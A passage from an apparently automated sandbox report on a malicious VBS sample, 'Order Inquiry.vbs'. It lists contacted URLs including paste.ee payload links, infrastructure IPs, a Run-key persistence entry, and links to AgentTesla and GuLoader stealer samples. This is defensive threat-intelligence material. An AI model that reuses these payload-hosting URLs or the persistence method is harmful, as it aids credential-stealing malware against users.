          https://www.google.comwscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.oracle.com/technetwork/java/javase/downloadsAddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://x1.c.lencr.org/0cert9.db.9.drfalse
          • URL Reputation: safe
          unknown
          http://x1.i.lencr.org/0cert9.db.9.drfalse
          • URL Reputation: safe
          unknown
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          unknown
          http://ip-api.comAddInProcess32.exe, 00000009.00000002.1681596776.000000000307E000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://paste.ee/d/3dasY0wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://icanhazip.comAddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://paste.ee/d/3dasY4wscript.exe, 00000000.00000003.1409306033.00000260C2CFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411281235.00000260C2D37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410321938.00000260C2D37000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1937420985.000001E4CFD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://secure.gravatar.comwscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.office.com/AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000003054000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmpE8C2.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://www.google.com/images/branding/product/ico/googleg_lodp.icoAddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://paste.ee/d/3dasY$wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6ltmpB97.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://www.google.com;wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://www.office.com/OfficetmpE8C2.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://chrome.google.com/webstore?hTAddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ocsp.rootca1.amazontrust.com0:cert9.db.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://www.ecosia.org/newtab/AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          unknown
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmpB97.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.office.com/LRAddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ac.ecosia.org/autocomplete?q=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          unknown
          https://paste.ee/_wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://uploaddeimagens.com.brpowershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://paste.ee/d/3dasYzwscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://analytics.paste.ee;wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://aka.ms/pscore68powershell.exe, 00000003.00000002.1937420985.000001E4CFD12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://support.mozilla.orgtmpB97.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          http://whatismyipaddressnow.coAddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          unknown
          https://paste.ee/Hwscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://themes.googleusercontent.comwscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://whatismyipaddressnow.coAddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          208.95.112.1
          ip-api.comUnited States
          53334TUT-ASUStrue
          188.114.97.3
          paste.eeEuropean Union
          13335CLOUDFLARENETUStrue
          188.114.96.3
          whatismyipaddressnow.coEuropean Union
          13335CLOUDFLARENETUSfalse
          104.16.185.241
          icanhazip.comUnited States
          13335CLOUDFLARENETUSfalse
          93.123.39.71
          unknownBulgaria
          43561NET1-ASBGfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1457271
          Start date and time:2024-06-14 15:14:01 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 7m 33s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:22
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Order Inquiry.vbs
          Detection:MAL
          Classification:mal100.spre.troj.spyw.expl.evad.winVBS@21/25@6/5
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 266
          • Number of non-executed functions: 9
          Cookbook Comments:
          • Found application associated with file extension: .vbs
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          TimeTypeDescription
          09:15:03API Interceptor42x Sleep call for process: powershell.exe modified
          09:15:17API Interceptor79x Sleep call for process: AddInProcess32.exe modified
          15:15:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path \\tsclient\C\Program Files\aburrar.vbs
          15:15:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path \\tsclient\C\Program Files\aburrar.vbs
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          208.95.112.1cotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          lista de cotizaciones.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          rIlzbkxg.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • ip-api.com/line/?fields=hosting
          rcotizaci__n.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • ip-api.com/line/?fields=hosting
          JUSTIFICANTE PAGO FACTURA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • ip-api.com/line/?fields=hosting
          Shipping Documents.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          NEW ORDER.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • ip-api.com/line/?fields=hosting
          SOA APRIL.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          rOrdendecompra_pdf__________________________.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ip-api.comcotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          lista de cotizaciones.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          rIlzbkxg.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 208.95.112.1
          rcotizaci__n.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 208.95.112.1
          JUSTIFICANTE PAGO FACTURA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 208.95.112.1
          Shipping Documents.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          NEW ORDER.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 208.95.112.1
          SOA APRIL.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          rOrdendecompra_pdf__________________________.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          paste.eecotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 188.114.96.3
          lista de cotizaciones.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 188.114.97.3
          Purchase Enquiry #PO-240902.jsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          xxh1GZYmD2.rtfGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          Specifications.jsGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          cotizaci#U00f2n.xlam.xlsxGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          Specifications.vbsGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          Contract 11-06-24.xlsGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          DHL AWB# 7954365.xlsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          G0000663.xlsGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          uploaddeimagens.com.brcotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 188.114.97.3
          lista de cotizaciones.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 188.114.97.3
          Purchase Enquiry #PO-240902.jsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          Specifications.jsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          cotizaci#U00f2n.xlam.xlsxGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          Specifications.vbsGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          Contract 11-06-24.xlsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          DHL AWB# 7954365.xlsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          G0000663.xlsGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          rF5MD.jsGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          whatismyipaddressnow.co171820386548cbbea4ed1903ede58ab5c6cfb71df0faa52822ed84c4f21b423dbf37ee3c0d777.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 188.114.97.3
          Purchase Order Enquiry #PO-240902.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 188.114.96.3
          Purchase Order Enquiry #PO-240902.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 188.114.96.3
          aou.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 188.114.97.3
          opp.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 188.114.96.3
          RFQ.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 188.114.96.3
          14posdLrGh.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 172.67.143.245
          RFQ-M310 .exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
          • 172.67.143.245
          file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
          • 172.67.143.245
          file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
          • 104.21.71.78
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUScotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 188.114.96.3
          PAYMENT SLIP 14-06-2024.xlam.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 104.17.96.13
          lista de cotizaciones.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 188.114.97.3
          Purchase Enquiry #PO-240902.jsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          Scanned file 1. Trip to Kenya.xlam.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 172.67.74.152
          Updated contract doc.oneGet hashmaliciousHTMLPhisherBrowse
          • 188.114.97.3
          QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 188.114.97.3
          https://we.tl/t-wde73b4qxtGet hashmaliciousUnknownBrowse
          • 172.64.151.101
          245087609-050738-sanlccjavap0003-1240_pdf .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 172.67.74.152
          http://misprogramaspc.com/itoolab-watsgoGet hashmaliciousUnknownBrowse
          • 104.17.25.14
          CLOUDFLARENETUScotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 188.114.96.3
          PAYMENT SLIP 14-06-2024.xlam.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 104.17.96.13
          lista de cotizaciones.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 188.114.97.3
          Purchase Enquiry #PO-240902.jsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          Scanned file 1. Trip to Kenya.xlam.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 172.67.74.152
          Updated contract doc.oneGet hashmaliciousHTMLPhisherBrowse
          • 188.114.97.3
          QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 188.114.97.3
          https://we.tl/t-wde73b4qxtGet hashmaliciousUnknownBrowse
          • 172.64.151.101
          245087609-050738-sanlccjavap0003-1240_pdf .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 172.67.74.152
          http://misprogramaspc.com/itoolab-watsgoGet hashmaliciousUnknownBrowse
          • 104.17.25.14
          TUT-ASUScotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          lista de cotizaciones.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          rIlzbkxg.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 208.95.112.1
          rcotizaci__n.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 208.95.112.1
          JUSTIFICANTE PAGO FACTURA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 208.95.112.1
          Shipping Documents.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          NEW ORDER.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 208.95.112.1
          SOA APRIL.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          rOrdendecompra_pdf__________________________.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          54328bd36c14bd82ddaa0c04b25ed9adMV WADI S PARTICULARS.exeGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.96.3
          Commodity Details.exeGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.96.3
          Vessel Information.exeGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.96.3
          Office Suppliers Order.exeGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.96.3
          Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.96.3
          SecuriteInfo.com.Win32.TrojanX-gen.29327.20826.exeGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.96.3
          171820386548cbbea4ed1903ede58ab5c6cfb71df0faa52822ed84c4f21b423dbf37ee3c0d777.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 188.114.96.3
          Purchase Order Enquiry #PO-240902.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 188.114.96.3
          Purchase Order Enquiry #PO-240902.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
          • 188.114.96.3
          Invoice Packing List.exeGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.96.3
          3b5074b1b5d032e5620f69f9f700ff0ePurchase Enquiry #PO-240902.jsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          • 188.114.96.3
          QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 188.114.97.3
          • 188.114.96.3
          245087609-050738-sanlccjavap0003-1240_pdf .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 188.114.97.3
          • 188.114.96.3
          http://misprogramaspc.com/itoolab-watsgoGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          • 188.114.96.3
          DriverAutomationTool (2).ps1Get hashmaliciousUnknownBrowse
          • 188.114.97.3
          • 188.114.96.3
          DriverAutomationTool.ps1Get hashmaliciousUnknownBrowse
          • 188.114.97.3
          • 188.114.96.3
          https://jenniferwelsh.comGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          • 188.114.96.3
          RlwD08ogvR.exeGet hashmaliciousDCRatBrowse
          • 188.114.97.3
          • 188.114.96.3
          Disparat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 188.114.97.3
          • 188.114.96.3
          Shipping Documents.exeGet hashmaliciousAgentTeslaBrowse
          • 188.114.97.3
          • 188.114.96.3
          37f463bf4616ecd445d4a1937da06e19Purchase Enquiry #PO-240902.jsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          n3ydjVzUYm.exeGet hashmaliciousCryptOne, VidarBrowse
          • 188.114.97.3
          xloader.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 188.114.97.3
          CamScanner0079.jpg.pif.exeGet hashmaliciousGuLoaderBrowse
          • 188.114.97.3
          Disparat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 188.114.97.3
          qiHXXzgR6f.exeGet hashmaliciousVidarBrowse
          • 188.114.97.3
          #U0625#U064a#U0635#U0627#U0644 #U0627#U0644#U062f#U0641#U0639.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 188.114.97.3
          file.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
          • 188.114.97.3
          file.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
          • 188.114.97.3
          jWtjLls2ZA.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
          • 188.114.97.3
          No context
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1616
          Entropy (8bit):5.346184626026755
          Encrypted:false
          SSDEEP:48:MxHKlYHKh3oPtHo6hAHKzePHcHHHKAHKx1qHxLHVHj:iqlYqh3oPtI6eqzG8nqAqxwRL1D
          MD5:35691637EEF06C3561696DC72CB1281C
          SHA1:BD00A3772D8C98F3318B3CEB8A85AFAA79252B80
          SHA-256:E7C8BB0ED4357F81D6B6FAD015E6767834D693336C561F45ACCFB7B99614B266
          SHA-512:F29AC88B0F592CF26E7B0F6EBC1D0FDE3DAA02F8FCE9D2BF632E6823EC5AA0BA4D6CD2AB801424EF1578E947F00BD1B20A7175B45DFC20A28A317906EAB2FA24
          Malicious:false
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen
          Process:C:\Windows\System32\wscript.exe
          File Type:ASCII text, with very long lines (11457), with CRLF line terminators
